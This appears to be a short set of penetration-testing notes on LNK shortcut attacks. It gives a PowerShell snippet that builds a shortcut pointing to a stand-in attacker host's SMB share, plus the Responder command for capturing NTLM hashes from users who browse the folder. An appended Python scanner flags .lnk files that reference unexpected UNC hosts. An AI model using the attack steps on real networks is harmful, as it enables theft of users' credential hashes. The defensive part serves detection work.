LNK File Attacks

  • Place a malicious LNK file in a shared folder; this can lead to capturing hashes through Responder

LNK File Creation
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\IP_ADDRESS_ATTACKER\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

  • Start Responder: sudo Responder.py -I eth0 -dPv

  • Navigate to the share and you should receive captured hashes in Responder

  • Note: Make sure SMB is turned ON in Responder.conf
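
For defenders, an added example (not part of the original notes): a Python check that reads each .lnk on a share as raw bytes, so nothing is resolved through the shell, and reports UNC hosts outside an allowlist. The function names, the allowlist and the bytes built by sample_lnk are assumptions made for illustration; the string match is a heuristic, not a full shell-link parser.

```python
import re
import struct
from pathlib import Path

# Shell link header (MS-SHLLINK): HeaderSize 0x4C followed by the LinkCLSID.
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")
HOST = rb"[A-Za-z0-9][A-Za-z0-9._-]*"
UNC_ASCII = re.compile(rb"\\\\(" + HOST + rb")")
# UTF-16LE strings: every ASCII character is followed by a NUL byte.
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)")


def unc_hosts(data: bytes) -> set[str]:
    """Return the hosts named in UNC paths anywhere in a .lnk file's bytes."""
    if not data.startswith(LNK_MAGIC):
        return set()  # not a shell link
    hosts = {m.group(1).decode("ascii").lower() for m in UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le").lower() for m in UNC_UTF16.finditer(data)}
    return hosts


def scan_share(root: str, allowed: set[str]) -> list[tuple[str, list[str]]]:
    """List .lnk files under root that reference hosts outside `allowed`."""
    findings = []
    for path in Path(root).rglob("*.lnk"):
        try:
            bad = unc_hosts(path.read_bytes()) - allowed
        except OSError:
            continue  # unreadable file, skip it
        if bad:
            findings.append((str(path), sorted(bad)))
    return findings


def sample_lnk(icon_path: str) -> bytes:
    """Constructed minimal shell link: 76-byte header plus an icon location string."""
    flags = struct.pack("<I", 0x40 | 0x80)  # HasIconLocation | IsUnicode
    body = struct.pack("<H", len(icon_path)) + icon_path.encode("utf-16-le")
    return LNK_MAGIC + flags + bytes(52) + body
```

Call scan_share with the share's mount point and the set of file servers shortcuts are expected to reference; any other host in a shortcut on a shared folder is worth a look.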
